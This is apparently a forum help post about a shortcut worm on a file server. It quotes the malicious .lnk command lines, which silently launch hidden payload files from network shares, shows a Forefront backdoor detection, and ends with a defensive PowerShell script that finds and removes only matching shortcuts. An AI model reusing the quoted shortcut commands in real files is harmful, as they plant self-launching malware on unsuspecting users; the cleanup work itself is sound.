The virus is hiding all of the folders and replacing them with shortcuts.
These are the settings in the shortcuts:
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\folder\cs3can"
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\Unloads\cs3d3t"
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\Unloads\cs3mex\unload_from_vegas_20120501"
I just completed a full scan on the server and it found this:
Backdoor:Win32/Caphaw.D
Category:
Backdoor
Description:
This program provides remote access to the computer it is installed on.
Recommended action: Remove this software immediately.
Forefront Endpoint Protection detected programs that may compromise your privacy or damage your computer. You can still access the files that these programs use without removing them (not recommended). To access these files, select the Allow action and click Apply actions. If this option is not available, log on as administrator or ask the security administrator for help.
Items:
file:E:\applications\Insite\Documents\Maps\xuAaQgW.hSp
Get more information about this item online.
Update: Why was this not picked up by Microsoft Forefront?
I would like to create a script which goes through these servers and deletes any shortcut which has C:\Windows\system32\cmd.exe /C start cmd.exe /C.
If I try to go through manually it will take a long time.
I have used this command inside a folder: del /s *.lnk
which does the job, but it deletes anything which is a .lnk.
I only want to delete shortcuts which begin with C:\Windows\system32\cmd.exe /C start cmd.exe /C.
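One way to do the selective cleanup asked for above, as an added example that is not part of the original post: a PowerShell script that reads each shortcut's target through the WScript.Shell COM object and matches only those that launch cmd.exe with arguments beginning `/C start cmd.exe /C`. The parameter names `Root`, `Report` and `Delete` are hypothetical; without `-Delete` it only reports.

```powershell
# Added example (not from the original post). Parameter names are hypothetical.
param(
    [Parameter(Mandatory = $true)][string]$Root,        # share or folder to scan
    [string]$Report = '.\matched-shortcuts.csv',        # record of every match
    [switch]$Delete                                     # omit to do a report-only run
)

$shell     = New-Object -ComObject WScript.Shell
$argPrefix = '/C start cmd.exe /C'                      # pattern quoted in the post

# -Force includes hidden and system items in the walk.
$hits = @(
    Get-ChildItem -LiteralPath $Root -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer -and $_.Extension -eq '.lnk' } |
        ForEach-Object {
            # CreateShortcut on an existing .lnk loads it; nothing is written unless Save() is called.
            $lnk      = $shell.CreateShortcut($_.FullName)
            $target   = [string]$lnk.TargetPath
            $lnkArgs  = ([string]$lnk.Arguments).TrimStart()
            $isCmd    = $target -match '\\cmd\.exe$'
            $isPrefix = $lnkArgs.StartsWith($argPrefix, [StringComparison]::OrdinalIgnoreCase)
            if ($isCmd -and $isPrefix) {
                [pscustomobject]@{
                    Path      = $_.FullName
                    Target    = $target
                    Arguments = $lnkArgs
                }
            }
        }
)

# Keep a record of what matched before anything is removed.
$hits | Export-Csv -Path $Report -NoTypeInformation
$hits | Format-List
Write-Output ("{0} matching shortcut(s) under {1}" -f $hits.Count, $Root)

if ($Delete) {
    foreach ($hit in $hits) {
        Remove-Item -LiteralPath $hit.Path -Force
    }
}
```

Run it once without `-Delete` and review the CSV; legitimate shortcuts, whose target is not cmd.exe with that argument prefix, are left alone.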